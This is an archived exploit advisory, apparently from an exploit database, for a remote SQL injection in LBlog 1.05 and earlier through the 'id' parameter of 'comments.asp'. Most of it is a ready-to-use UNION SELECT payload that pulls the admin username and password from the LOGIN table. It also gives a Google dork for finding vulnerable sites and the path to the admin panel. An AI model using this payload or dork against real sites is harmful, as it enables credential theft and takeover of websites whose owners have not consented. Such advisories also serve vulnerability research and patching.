id: 728
date: 08/19/2006
title: LBlog <= 1.05 (comments.asp) Remote SQL Injection Vulnerability
author: Chironex Fleckeri
cves: 

===============================================================
LBlog <= 1.05 (comments.asp) Remote SQL Injection Vulnerability
===============================================================




################################################################################
##                                                                            ##

##  LBlog <= "comments.asp" SQL Injection Exploit                             ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##  Credit by        |  Chironex Fleckeri                                     ##

##  Googledork       |  Powered By LBlog                                      ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##                                                                            ##
################################################################################

###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
###################################################################################################################

#################################################
#Admin Panel : http://www.target.com/path/admin #
#################################################



#  0day.today [2023-03-25]  #